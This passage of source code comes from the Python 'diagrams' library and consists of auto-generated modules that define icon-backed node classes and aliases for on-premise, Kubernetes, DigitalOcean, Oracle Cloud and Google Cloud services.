CircleCI = Circleci ConcourseCI = Concourseci DroneCI = Droneci GitlabCI = Gitlabci TravisCI = Travisci TC = Teamcity ZuulCI = Zuulci File: diagrams/onprem/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Monitoring(_OnPrem): _type = "monitoring" _icon_dir = "resources/onprem/monitoring" class Cortex(_Monitoring): _icon = "cortex.png" class Datadog(_Monitoring): _icon = "datadog.png" class Dynatrace(_Monitoring): _icon = "dynatrace.png" class Grafana(_Monitoring): _icon = "grafana.png" class Humio(_Monitoring): _icon = "humio.png" class Mimir(_Monitoring): _icon = "mimir.png" class Nagios(_Monitoring): _icon = "nagios.png" class Newrelic(_Monitoring): _icon = "newrelic.png" class PrometheusOperator(_Monitoring): _icon = "prometheus-operator.png" class Prometheus(_Monitoring): _icon = "prometheus.png" class Sentry(_Monitoring): _icon = "sentry.png" class Splunk(_Monitoring): _icon = "splunk.png" class Thanos(_Monitoring): _icon = "thanos.png" class Zabbix(_Monitoring): _icon = "zabbix.png" # Aliases File: diagrams/onprem/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Database(_OnPrem): _type = "database" _icon_dir = "resources/onprem/database" class Cassandra(_Database): _icon = "cassandra.png" class Clickhouse(_Database): _icon = "clickhouse.png" class Cockroachdb(_Database): _icon = "cockroachdb.png" class Couchbase(_Database): _icon = "couchbase.png" class Couchdb(_Database): _icon = "couchdb.png" class Dgraph(_Database): _icon = "dgraph.png" class Druid(_Database): _icon = "druid.png" class Hbase(_Database): _icon = "hbase.png" class Influxdb(_Database): _icon = "influxdb.png" class Janusgraph(_Database): _icon = "janusgraph.png" class Mariadb(_Database): _icon = "mariadb.png" class Mongodb(_Database): _icon = "mongodb.png" class Mssql(_Database): _icon = "mssql.png" class Mysql(_Database): _icon = "mysql.png" class Neo4J(_Database): _icon = "neo4j.png" class Oracle(_Database): _icon = "oracle.png" class Postgresql(_Database): _icon = "postgresql.png" class Scylla(_Database): _icon = "scylla.png" # Aliases ClickHouse = Clickhouse CockroachDB = Cockroachdb CouchDB = Couchdb HBase = Hbase InfluxDB = Influxdb JanusGraph = Janusgraph MariaDB = Mariadb MongoDB = Mongodb MSSQL = Mssql MySQL = Mysql PostgreSQL = Postgresql File: diagrams/onprem/client.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Client(_OnPrem): _type = "client" _icon_dir = "resources/onprem/client" class Client(_Client): _icon = "client.png" class User(_Client): _icon = "user.png" class Users(_Client): _icon = "users.png" # Aliases File: diagrams/onprem/mlops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Mlops(_OnPrem): _type = "mlops" _icon_dir = "resources/onprem/mlops" class Mlflow(_Mlops): _icon = "mlflow.png" class Polyaxon(_Mlops): _icon = "polyaxon.png" # Aliases File: diagrams/onprem/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Security(_OnPrem): _type = "security" _icon_dir = "resources/onprem/security" class Bitwarden(_Security): _icon = "bitwarden.png" class Trivy(_Security): _icon = "trivy.png" class Vault(_Security): _icon = "vault.png" # Aliases File: diagrams/onprem/iac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Iac(_OnPrem): _type = "iac" _icon_dir = "resources/onprem/iac" class Ansible(_Iac): _icon = "ansible.png" class Atlantis(_Iac): _icon = "atlantis.png" class Awx(_Iac): _icon = "awx.png" class Puppet(_Iac): _icon = "puppet.png" class Terraform(_Iac): _icon = "terraform.png" # Aliases File: diagrams/onprem/__init__.py """ OnPrem provides a set of general on-premise services. """ from diagrams import Node class _OnPrem(Node): _provider = "onprem" _icon_dir = "resources/onprem" fontcolor = "#ffffff" File: diagrams/onprem/certificates.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Certificates(_OnPrem): _type = "certificates" _icon_dir = "resources/onprem/certificates" class CertManager(_Certificates): _icon = "cert-manager.png" class LetsEncrypt(_Certificates): _icon = "lets-encrypt.png" # Aliases File: diagrams/onprem/inmemory.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Inmemory(_OnPrem): _type = "inmemory" _icon_dir = "resources/onprem/inmemory" class Aerospike(_Inmemory): _icon = "aerospike.png" class Hazelcast(_Inmemory): _icon = "hazelcast.png" class Memcached(_Inmemory): _icon = "memcached.png" class Redis(_Inmemory): _icon = "redis.png" # Aliases File: diagrams/onprem/container.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Container(_OnPrem): _type = "container" _icon_dir = "resources/onprem/container" class Containerd(_Container): _icon = "containerd.png" class Crio(_Container): _icon = "crio.png" class Docker(_Container): _icon = "docker.png" class Firecracker(_Container): _icon = "firecracker.png" class Gvisor(_Container): _icon = "gvisor.png" class K3S(_Container): _icon = "k3s.png" class Lxc(_Container): _icon = "lxc.png" class Rkt(_Container): _icon = "rkt.png" # Aliases LXC = Lxc RKT = Rkt File: diagrams/onprem/proxmox.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Proxmox(_OnPrem): _type = "proxmox" _icon_dir = "resources/onprem/proxmox" class Pve(_Proxmox): _icon = "pve.png" # Aliases ProxmoxVE = Pve File: diagrams/onprem/vcs.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Vcs(_OnPrem): _type = "vcs" _icon_dir = "resources/onprem/vcs" class Git(_Vcs): _icon = "git.png" class Gitea(_Vcs): _icon = "gitea.png" class Github(_Vcs): _icon = "github.png" class Gitlab(_Vcs): _icon = "gitlab.png" class Svn(_Vcs): _icon = "svn.png" # Aliases File: diagrams/onprem/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Storage(_OnPrem): _type = "storage" _icon_dir = "resources/onprem/storage" class CephOsd(_Storage): _icon = "ceph-osd.png" class Ceph(_Storage): _icon = "ceph.png" class Glusterfs(_Storage): _icon = "glusterfs.png" class Portworx(_Storage): _icon = "portworx.png" # Aliases CEPH = Ceph CEPH_OSD = CephOsd File: diagrams/onprem/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Network(_OnPrem): _type = "network" _icon_dir = "resources/onprem/network" class Ambassador(_Network): _icon = "ambassador.png" class Apache(_Network): _icon = "apache.png" class Bind9(_Network): _icon = "bind-9.png" class Caddy(_Network): _icon = "caddy.png" class Consul(_Network): _icon = "consul.png" class Envoy(_Network): _icon = "envoy.png" class Etcd(_Network): _icon = "etcd.png" class Glassfish(_Network): _icon = "glassfish.png" class Gunicorn(_Network): _icon = "gunicorn.png" class Haproxy(_Network): _icon = "haproxy.png" class Internet(_Network): _icon = "internet.png" class Istio(_Network): _icon = "istio.png" class Jbossas(_Network): _icon = "jbossas.png" class Jetty(_Network): _icon = "jetty.png" class Kong(_Network): _icon = "kong.png" class Linkerd(_Network): _icon = "linkerd.png" class Nginx(_Network): _icon = "nginx.png" class Ocelot(_Network): _icon = "ocelot.png" class OpenServiceMesh(_Network): _icon = "open-service-mesh.png" class Opnsense(_Network): _icon = "opnsense.png" class Pfsense(_Network): _icon = "pfsense.png" class Pomerium(_Network): _icon = "pomerium.png" class Powerdns(_Network): _icon = "powerdns.png" class Tomcat(_Network): _icon = "tomcat.png" class Traefik(_Network): _icon = "traefik.png" class Tyk(_Network): _icon = "tyk.png" class Vyos(_Network): _icon = "vyos.png" class Wildfly(_Network): _icon = "wildfly.png" class Yarp(_Network): _icon = "yarp.png" class Zookeeper(_Network): _icon = "zookeeper.png" # Aliases ETCD = Etcd HAProxy = Haproxy OSM = OpenServiceMesh OPNSense = Opnsense PFSense = Pfsense VyOS = Vyos File: diagrams/onprem/search.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Search(_OnPrem): _type = "search" _icon_dir = "resources/onprem/search" class Solr(_Search): _icon = "solr.png" # Aliases File: diagrams/onprem/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Analytics(_OnPrem): _type = "analytics" _icon_dir = "resources/onprem/analytics" class Beam(_Analytics): _icon = "beam.png" class Databricks(_Analytics): _icon = "databricks.png" class Dbt(_Analytics): _icon = "dbt.png" class Dremio(_Analytics): _icon = "dremio.png" class Flink(_Analytics): _icon = "flink.png" class Hadoop(_Analytics): _icon = "hadoop.png" class Hive(_Analytics): _icon = "hive.png" class Metabase(_Analytics): _icon = "metabase.png" class Norikra(_Analytics): _icon = "norikra.png" class Powerbi(_Analytics): _icon = "powerbi.png" class Presto(_Analytics): _icon = "presto.png" class Singer(_Analytics): _icon = "singer.png" class Spark(_Analytics): _icon = "spark.png" class Storm(_Analytics): _icon = "storm.png" class Superset(_Analytics): _icon = "superset.png" class Tableau(_Analytics): _icon = "tableau.png" class Trino(_Analytics): _icon = "trino.png" # Aliases PowerBI = Powerbi File: diagrams/onprem/groupware.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Groupware(_OnPrem): _type = "groupware" _icon_dir = "resources/onprem/groupware" class Nextcloud(_Groupware): _icon = "nextcloud.png" # Aliases File: diagrams/onprem/workflow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Workflow(_OnPrem): _type = "workflow" _icon_dir = "resources/onprem/workflow" class Airflow(_Workflow): _icon = "airflow.png" class Digdag(_Workflow): _icon = "digdag.png" class Kubeflow(_Workflow): _icon = "kubeflow.png" class Nifi(_Workflow): _icon = "nifi.png" # Aliases KubeFlow = Kubeflow NiFi = Nifi File: diagrams/onprem/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Identity(_OnPrem): _type = "identity" _icon_dir = "resources/onprem/identity" class Dex(_Identity): _icon = "dex.png" # Aliases File: diagrams/onprem/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Compute(_OnPrem): _type = "compute" _icon_dir = "resources/onprem/compute" class Nomad(_Compute): _icon = "nomad.png" class Server(_Compute): _icon = "server.png" # Aliases File: diagrams/onprem/messaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Messaging(_OnPrem): _type = "messaging" _icon_dir = "resources/onprem/messaging" class Centrifugo(_Messaging): _icon = "centrifugo.png" # Aliases File: diagrams/onprem/cd.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Cd(_OnPrem): _type = "cd" _icon_dir = "resources/onprem/cd" class Spinnaker(_Cd): _icon = "spinnaker.png" class TektonCli(_Cd): _icon = "tekton-cli.png" class Tekton(_Cd): _icon = "tekton.png" # Aliases File: diagrams/k8s/controlplane.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Controlplane(_K8S): _type = "controlplane" _icon_dir = "resources/k8s/controlplane" class API(_Controlplane): _icon = "api.png" class CCM(_Controlplane): _icon = "c-c-m.png" class CM(_Controlplane): _icon = "c-m.png" class KProxy(_Controlplane): _icon = "k-proxy.png" class Kubelet(_Controlplane): _icon = "kubelet.png" class Sched(_Controlplane): _icon = "sched.png" # Aliases APIServer = API ControllerManager = CM KubeProxy = KProxy Scheduler = Sched File: diagrams/k8s/clusterconfig.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Clusterconfig(_K8S): _type = "clusterconfig" _icon_dir = "resources/k8s/clusterconfig" class HPA(_Clusterconfig): _icon = "hpa.png" class Limits(_Clusterconfig): _icon = "limits.png" class Quota(_Clusterconfig): _icon = "quota.png" # Aliases LimitRange = Limits HorizontalPodAutoscaler = HPA File: diagrams/k8s/chaos.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Chaos(_K8S): _type = "chaos" _icon_dir = "resources/k8s/chaos" class ChaosMesh(_Chaos): _icon = "chaos-mesh.png" class LitmusChaos(_Chaos): _icon = "litmus-chaos.png" # Aliases File: diagrams/k8s/rbac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Rbac(_K8S): _type = "rbac" _icon_dir = "resources/k8s/rbac" class CRole(_Rbac): _icon = "c-role.png" class CRB(_Rbac): _icon = "crb.png" class Group(_Rbac): _icon = "group.png" class RB(_Rbac): _icon = "rb.png" class Role(_Rbac): _icon = "role.png" class SA(_Rbac): _icon = "sa.png" class User(_Rbac): _icon = "user.png" # Aliases ClusterRole = CRole ClusterRoleBinding = CRB RoleBinding = RB ServiceAccount = SA File: diagrams/k8s/__init__.py """ K8S provides a set of services for Kubernetes. """ from diagrams import Node class _K8S(Node): _provider = "k8s" _icon_dir = "resources/k8s" fontcolor = "#2d3436" File: diagrams/k8s/podconfig.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Podconfig(_K8S): _type = "podconfig" _icon_dir = "resources/k8s/podconfig" class CM(_Podconfig): _icon = "cm.png" class Secret(_Podconfig): _icon = "secret.png" # Aliases ConfigMap = CM File: diagrams/k8s/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Storage(_K8S): _type = "storage" _icon_dir = "resources/k8s/storage" class PV(_Storage): _icon = "pv.png" class PVC(_Storage): _icon = "pvc.png" class SC(_Storage): _icon = "sc.png" class Vol(_Storage): _icon = "vol.png" # Aliases PersistentVolume = PV PersistentVolumeClaim = PVC StorageClass = SC Volume = Vol File: diagrams/k8s/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Network(_K8S): _type = "network" _icon_dir = "resources/k8s/network" class Ep(_Network): _icon = "ep.png" class Ing(_Network): _icon = "ing.png" class Netpol(_Network): _icon = "netpol.png" class SVC(_Network): _icon = "svc.png" # Aliases Endpoint = Ep Ingress = Ing NetworkPolicy = Netpol Service = SVC File: diagrams/k8s/group.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Group(_K8S): _type = "group" _icon_dir = "resources/k8s/group" class NS(_Group): _icon = "ns.png" # Aliases Namespace = NS File: diagrams/k8s/infra.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Infra(_K8S): _type = "infra" _icon_dir = "resources/k8s/infra" class ETCD(_Infra): _icon = "etcd.png" class Master(_Infra): _icon = "master.png" class Node(_Infra): _icon = "node.png" # Aliases File: diagrams/k8s/others.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Others(_K8S): _type = "others" _icon_dir = "resources/k8s/others" class CRD(_Others): _icon = "crd.png" class PSP(_Others): _icon = "psp.png" # Aliases File: diagrams/k8s/ecosystem.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Ecosystem(_K8S): _type = "ecosystem" _icon_dir = "resources/k8s/ecosystem" class ExternalDns(_Ecosystem): _icon = "external-dns.png" class Helm(_Ecosystem): _icon = "helm.png" class Krew(_Ecosystem): _icon = "krew.png" class Kustomize(_Ecosystem): _icon = "kustomize.png" # Aliases File: diagrams/k8s/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Compute(_K8S): _type = "compute" _icon_dir = "resources/k8s/compute" class Cronjob(_Compute): _icon = "cronjob.png" class Deploy(_Compute): _icon = "deploy.png" class DS(_Compute): _icon = "ds.png" class Job(_Compute): _icon = "job.png" class Pod(_Compute): _icon = "pod.png" class RS(_Compute): _icon = "rs.png" class STS(_Compute): _icon = "sts.png" # Aliases Deployment = Deploy DaemonSet = DS ReplicaSet = RS StatefulSet = STS File: diagrams/digitalocean/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Database(_DigitalOcean): _type = "database" _icon_dir = "resources/digitalocean/database" class DbaasPrimaryStandbyMore(_Database): _icon = "dbaas-primary-standby-more.png" class DbaasPrimary(_Database): _icon = "dbaas-primary.png" class DbaasReadOnly(_Database): _icon = "dbaas-read-only.png" class DbaasStandby(_Database): _icon = "dbaas-standby.png" # Aliases File: diagrams/digitalocean/__init__.py """ DigitalOcean provides a set of services for DigitalOcean provider. """ from diagrams import Node class _DigitalOcean(Node): _provider = "digitalocean" _icon_dir = "resources/digitalocean" fontcolor = "#ffffff" File: diagrams/digitalocean/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Storage(_DigitalOcean): _type = "storage" _icon_dir = "resources/digitalocean/storage" class Folder(_Storage): _icon = "folder.png" class Space(_Storage): _icon = "space.png" class VolumeSnapshot(_Storage): _icon = "volume-snapshot.png" class Volume(_Storage): _icon = "volume.png" # Aliases File: diagrams/digitalocean/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Network(_DigitalOcean): _type = "network" _icon_dir = "resources/digitalocean/network" class Certificate(_Network): _icon = "certificate.png" class DomainRegistration(_Network): _icon = "domain-registration.png" class Domain(_Network): _icon = "domain.png" class Firewall(_Network): _icon = "firewall.png" class FloatingIp(_Network): _icon = "floating-ip.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class ManagedVpn(_Network): _icon = "managed-vpn.png" class Vpc(_Network): _icon = "vpc.png" # Aliases File: diagrams/digitalocean/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Compute(_DigitalOcean): _type = "compute" _icon_dir = "resources/digitalocean/compute" class Containers(_Compute): _icon = "containers.png" class Docker(_Compute): _icon = "docker.png" class DropletConnect(_Compute): _icon = "droplet-connect.png" class DropletSnapshot(_Compute): _icon = "droplet-snapshot.png" class Droplet(_Compute): _icon = "droplet.png" class K8SCluster(_Compute): _icon = "k8s-cluster.png" class K8SNodePool(_Compute): _icon = "k8s-node-pool.png" class K8SNode(_Compute): _icon = "k8s-node.png" # Aliases File: diagrams/oci/connectivity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Connectivity(_OCI): _type = "connectivity" _icon_dir = "resources/oci/connectivity" class BackboneWhite(_Connectivity): _icon = "backbone-white.png" class Backbone(_Connectivity): _icon = "backbone.png" class CDNWhite(_Connectivity): _icon = "cdn-white.png" class CDN(_Connectivity): _icon = "cdn.png" class CustomerDatacenter(_Connectivity): _icon = "customer-datacenter.png" class CustomerDatacntrWhite(_Connectivity): _icon = "customer-datacntr-white.png" class CustomerPremiseWhite(_Connectivity): _icon = "customer-premise-white.png" class CustomerPremise(_Connectivity): _icon = "customer-premise.png" class DisconnectedRegionsWhite(_Connectivity): _icon = "disconnected-regions-white.png" class DisconnectedRegions(_Connectivity): _icon = "disconnected-regions.png" class DNSWhite(_Connectivity): _icon = "dns-white.png" class DNS(_Connectivity): _icon = "dns.png" class FastConnectWhite(_Connectivity): _icon = "fast-connect-white.png" class FastConnect(_Connectivity): _icon = "fast-connect.png" class NATGatewayWhite(_Connectivity): _icon = "nat-gateway-white.png" class NATGateway(_Connectivity): _icon = "nat-gateway.png" class VPNWhite(_Connectivity): _icon = "vpn-white.png" class VPN(_Connectivity): _icon = "vpn.png" # Aliases File: diagrams/oci/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Monitoring(_OCI): _type = "monitoring" _icon_dir = "resources/oci/monitoring" class AlarmWhite(_Monitoring): _icon = "alarm-white.png" class Alarm(_Monitoring): _icon = "alarm.png" class EmailWhite(_Monitoring): _icon = "email-white.png" class Email(_Monitoring): _icon = "email.png" class EventsWhite(_Monitoring): _icon = "events-white.png" class Events(_Monitoring): _icon = "events.png" class HealthCheckWhite(_Monitoring): _icon = "health-check-white.png" class HealthCheck(_Monitoring): _icon = "health-check.png" class NotificationsWhite(_Monitoring): _icon = "notifications-white.png" class Notifications(_Monitoring): _icon = "notifications.png" class QueueWhite(_Monitoring): _icon = "queue-white.png" class Queue(_Monitoring): _icon = "queue.png" class SearchWhite(_Monitoring): _icon = "search-white.png" class Search(_Monitoring): _icon = "search.png" class TelemetryWhite(_Monitoring): _icon = "telemetry-white.png" class Telemetry(_Monitoring): _icon = "telemetry.png" class WorkflowWhite(_Monitoring): _icon = "workflow-white.png" class Workflow(_Monitoring): _icon = "workflow.png" # Aliases File: diagrams/oci/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Database(_OCI): _type = "database" _icon_dir = "resources/oci/database" class AutonomousWhite(_Database): _icon = "autonomous-white.png" class Autonomous(_Database): _icon = "autonomous.png" class BigdataServiceWhite(_Database): _icon = "bigdata-service-white.png" class BigdataService(_Database): _icon = "bigdata-service.png" class DatabaseServiceWhite(_Database): _icon = "database-service-white.png" class DatabaseService(_Database): _icon = "database-service.png" class DataflowApacheWhite(_Database): _icon = "dataflow-apache-white.png" class DataflowApache(_Database): _icon = "dataflow-apache.png" class DcatWhite(_Database): _icon = "dcat-white.png" class Dcat(_Database): _icon = "dcat.png" class DisWhite(_Database): _icon = "dis-white.png" class Dis(_Database): _icon = "dis.png" class DMSWhite(_Database): _icon = "dms-white.png" class DMS(_Database): _icon = "dms.png" class ScienceWhite(_Database): _icon = "science-white.png" class Science(_Database): _icon = "science.png" class StreamWhite(_Database): _icon = "stream-white.png" class Stream(_Database): _icon = "stream.png" # Aliases ADB = Autonomous ADBWhite = AutonomousWhite DBService = DatabaseService DBServiceWhite = DatabaseServiceWhite File: diagrams/oci/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Security(_OCI): _type = "security" _icon_dir = "resources/oci/security" class CloudGuardWhite(_Security): _icon = "cloud-guard-white.png" class CloudGuard(_Security): _icon = "cloud-guard.png" class DDOSWhite(_Security): _icon = "ddos-white.png" class DDOS(_Security): _icon = "ddos.png" class EncryptionWhite(_Security): _icon = "encryption-white.png" class Encryption(_Security): _icon = "encryption.png" class IDAccessWhite(_Security): _icon = "id-access-white.png" class IDAccess(_Security): _icon = "id-access.png" class KeyManagementWhite(_Security): _icon = "key-management-white.png" class KeyManagement(_Security): _icon = "key-management.png" class MaxSecurityZoneWhite(_Security): _icon = "max-security-zone-white.png" class MaxSecurityZone(_Security): _icon = "max-security-zone.png" class VaultWhite(_Security): _icon = "vault-white.png" class Vault(_Security): _icon = "vault.png" class WAFWhite(_Security): _icon = "waf-white.png" class WAF(_Security): _icon = "waf.png" # Aliases File: diagrams/oci/__init__.py """ OCI provides a set of services for Oracle Cloud Infrastructure provider. """ from diagrams import Node class _OCI(Node): _provider = "oci" _icon_dir = "resources/oci" fontcolor = "#312D2A" File: diagrams/oci/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Devops(_OCI): _type = "devops" _icon_dir = "resources/oci/devops" class APIGatewayWhite(_Devops): _icon = "api-gateway-white.png" class APIGateway(_Devops): _icon = "api-gateway.png" class APIServiceWhite(_Devops): _icon = "api-service-white.png" class APIService(_Devops): _icon = "api-service.png" class ResourceMgmtWhite(_Devops): _icon = "resource-mgmt-white.png" class ResourceMgmt(_Devops): _icon = "resource-mgmt.png" # Aliases File: diagrams/oci/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Storage(_OCI): _type = "storage" _icon_dir = "resources/oci/storage" class BackupRestoreWhite(_Storage): _icon = "backup-restore-white.png" class BackupRestore(_Storage): _icon = "backup-restore.png" class BlockStorageCloneWhite(_Storage): _icon = "block-storage-clone-white.png" class BlockStorageClone(_Storage): _icon = "block-storage-clone.png" class BlockStorageWhite(_Storage): _icon = "block-storage-white.png" class BlockStorage(_Storage): _icon = "block-storage.png" class BucketsWhite(_Storage): _icon = "buckets-white.png" class Buckets(_Storage): _icon = "buckets.png" class DataTransferWhite(_Storage): _icon = "data-transfer-white.png" class DataTransfer(_Storage): _icon = "data-transfer.png" class ElasticPerformanceWhite(_Storage): _icon = "elastic-performance-white.png" class ElasticPerformance(_Storage): _icon = "elastic-performance.png" class FileStorageWhite(_Storage): _icon = "file-storage-white.png" class FileStorage(_Storage): _icon = "file-storage.png" class ObjectStorageWhite(_Storage): _icon = "object-storage-white.png" class ObjectStorage(_Storage): _icon = "object-storage.png" class StorageGatewayWhite(_Storage): _icon = "storage-gateway-white.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" # Aliases File: diagrams/oci/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Network(_OCI): _type = "network" _icon_dir = "resources/oci/network" class DrgWhite(_Network): _icon = "drg-white.png" class Drg(_Network): _icon = "drg.png" class FirewallWhite(_Network): _icon = "firewall-white.png" class Firewall(_Network): _icon = "firewall.png" class InternetGatewayWhite(_Network): _icon = "internet-gateway-white.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class LoadBalancerWhite(_Network): _icon = "load-balancer-white.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class RouteTableWhite(_Network): _icon = "route-table-white.png" class RouteTable(_Network): _icon = "route-table.png" class SecurityListsWhite(_Network): _icon = "security-lists-white.png" class SecurityLists(_Network): _icon = "security-lists.png" class ServiceGatewayWhite(_Network): _icon = "service-gateway-white.png" class ServiceGateway(_Network): _icon = "service-gateway.png" class VcnWhite(_Network): _icon = "vcn-white.png" class Vcn(_Network): _icon = "vcn.png" # Aliases File: diagrams/oci/governance.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Governance(_OCI): _type = "governance" _icon_dir = "resources/oci/governance" class AuditWhite(_Governance): _icon = "audit-white.png" class Audit(_Governance): _icon = "audit.png" class CompartmentsWhite(_Governance): _icon = "compartments-white.png" class Compartments(_Governance): _icon = "compartments.png" class GroupsWhite(_Governance): _icon = "groups-white.png" class Groups(_Governance): _icon = "groups.png" class LoggingWhite(_Governance): _icon = "logging-white.png" class Logging(_Governance): _icon = "logging.png" class OCIDWhite(_Governance): _icon = "ocid-white.png" class OCID(_Governance): _icon = "ocid.png" class PoliciesWhite(_Governance): _icon = "policies-white.png" class Policies(_Governance): _icon = "policies.png" class TaggingWhite(_Governance): _icon = "tagging-white.png" class Tagging(_Governance): _icon = "tagging.png" # Aliases File: diagrams/oci/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Compute(_OCI): _type = "compute" _icon_dir = "resources/oci/compute" class AutoscaleWhite(_Compute): _icon = "autoscale-white.png" class Autoscale(_Compute): _icon = "autoscale.png" class BMWhite(_Compute): _icon = "bm-white.png" class BM(_Compute): _icon = "bm.png" class ContainerWhite(_Compute): _icon = "container-white.png" class Container(_Compute): _icon = "container.png" class FunctionsWhite(_Compute): _icon = "functions-white.png" class Functions(_Compute): _icon = "functions.png" class InstancePoolsWhite(_Compute): _icon = "instance-pools-white.png" class InstancePools(_Compute): _icon = "instance-pools.png" class OCIRWhite(_Compute): _icon = "ocir-white.png" class OCIR(_Compute): _icon = "ocir.png" class OKEWhite(_Compute): _icon = "oke-white.png" class OKE(_Compute): _icon = "oke.png" class VMWhite(_Compute): _icon = "vm-white.png" class VM(_Compute): _icon = "vm.png" # Aliases VirtualMachine = VM VirtualMachineWhite = VMWhite BareMetal = BM BareMetalWhite = BMWhite OCIRegistry = OCIR OCIRegistryWhite = OCIRWhite ContainerEngine = OKE ContainerEngineWhite = OKEWhite File: diagrams/gcp/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Database(_GCP): _type = "database" _icon_dir = "resources/gcp/database" class Bigtable(_Database): _icon = "bigtable.png" class Datastore(_Database): _icon = "datastore.png" class Firestore(_Database): _icon = "firestore.png" class Memorystore(_Database): _icon = "memorystore.png" class Spanner(_Database): _icon = "spanner.png" class SQL(_Database): _icon = "sql.png" # Aliases BigTable = Bigtable File: diagrams/gcp/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Security(_GCP): _type = "security" _icon_dir = "resources/gcp/security" class Iam(_Security): _icon = "iam.png" class IAP(_Security): _icon = "iap.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class ResourceManager(_Security): _icon = "resource-manager.png" class SecurityCommandCenter(_Security): _icon = "security-command-center.png" class SecurityScanner(_Security): _icon = "security-scanner.png" # Aliases KMS = KeyManagementService SCC = SecurityCommandCenter File: diagrams/gcp/__init__.py """ GCP provides a set of services for Google Cloud Platform provider. """ from diagrams import Node class _GCP(Node): _provider = "gcp" _icon_dir = "resources/gcp" fontcolor = "#2d3436" File: diagrams/gcp/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _ML(_GCP): _type = "ml" _icon_dir = "resources/gcp/ml" class AdvancedSolutionsLab(_ML): _icon = "advanced-solutions-lab.png" class AIHub(_ML): _icon = "ai-hub.png" class AIPlatformDataLabelingService(_ML): _icon = "ai-platform-data-labeling-service.png" class AIPlatform(_ML): _icon = "ai-platform.png" class AutomlNaturalLanguage(_ML): _icon = "automl-natural-language.png" class AutomlTables(_ML): _icon = "automl-tables.png" class AutomlTranslation(_ML): _icon = "automl-translation.png" class AutomlVideoIntelligence(_ML): _icon = "automl-video-intelligence.png" class AutomlVision(_ML): _icon = "automl-vision.png" class Automl(_ML): _icon = "automl.png" class DialogFlowEnterpriseEdition(_ML): _icon = "dialog-flow-enterprise-edition.png" class InferenceAPI(_ML): _icon = "inference-api.png" class JobsAPI(_ML): _icon = "jobs-api.png" class NaturalLanguageAPI(_ML): _icon = "natural-language-api.png" class RecommendationsAI(_ML): _icon = "recommendations-ai.png" class SpeechToText(_ML): _icon = "speech-to-text.png" class TextToSpeech(_ML): _icon = "text-to-speech.png" class TPU(_ML): _icon = "tpu.png" class TranslationAPI(_ML): _icon = "translation-api.png" class VideoIntelligenceAPI(_ML): _icon = "video-intelligence-api.png" class VisionAPI(_ML): _icon = "vision-api.png" # Aliases AutoML = Automl NLAPI = NaturalLanguageAPI STT = SpeechToText TTS = TextToSpeech File: diagrams/gcp/api.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _API(_GCP): _type = "api" _icon_dir = 